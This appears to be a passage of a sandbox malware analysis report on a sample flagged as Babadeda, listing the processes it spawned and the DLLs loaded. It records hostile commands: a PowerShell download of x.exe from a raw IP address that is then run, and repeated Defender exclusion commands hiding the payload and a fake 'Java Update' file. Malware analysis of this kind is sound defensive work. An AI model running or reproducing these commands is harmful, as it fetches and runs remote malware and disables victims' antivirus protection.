                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: avicap32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msvfw32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Java Update (32bit).lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Java Update (32bit).exe
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                              Data Obfuscation

                              barindex
                              Yara detected Babadeda
                              Source: Yara matchFile source: da6ke5KbfB.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.da6ke5KbfB.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.da6ke5KbfB.exe.400000.0.unpack, type: UNPACKEDPE
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: x.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
